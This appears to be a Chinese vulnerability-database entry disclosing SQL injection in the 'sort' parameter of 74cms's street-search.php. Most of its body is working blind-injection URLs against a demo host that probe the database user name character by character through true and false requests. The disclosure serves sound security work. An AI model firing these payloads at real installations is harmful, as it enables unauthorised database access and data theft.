74cms street-search.php sql注入

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

http://demo.74cms.com/jobs/street-search.php?sort=wage%3Edesc%27&page=1&streetid=&inforow= sort参数存在SQL注入 ![text](http://www.wooyun.org/upload/201411/031220282440b49049e45911f9c4f787edab1bdf.png) 盲注: 正确:http://demo.74cms.com/jobs/street-search.php?sort=hot%3Easc,if(strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),id,click)%20limit%201%23&page=1&streetid=&inforow= 错误: http://demo.74cms.com/jobs/street-search.php?sort=hot%3Easc,if(strcmp(substr(user(),1,13),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),id,click)%20limit%201%23&page=1&streetid=&inforow=

0%
暂无可用Exp或PoC
当前有0条受影响产品信息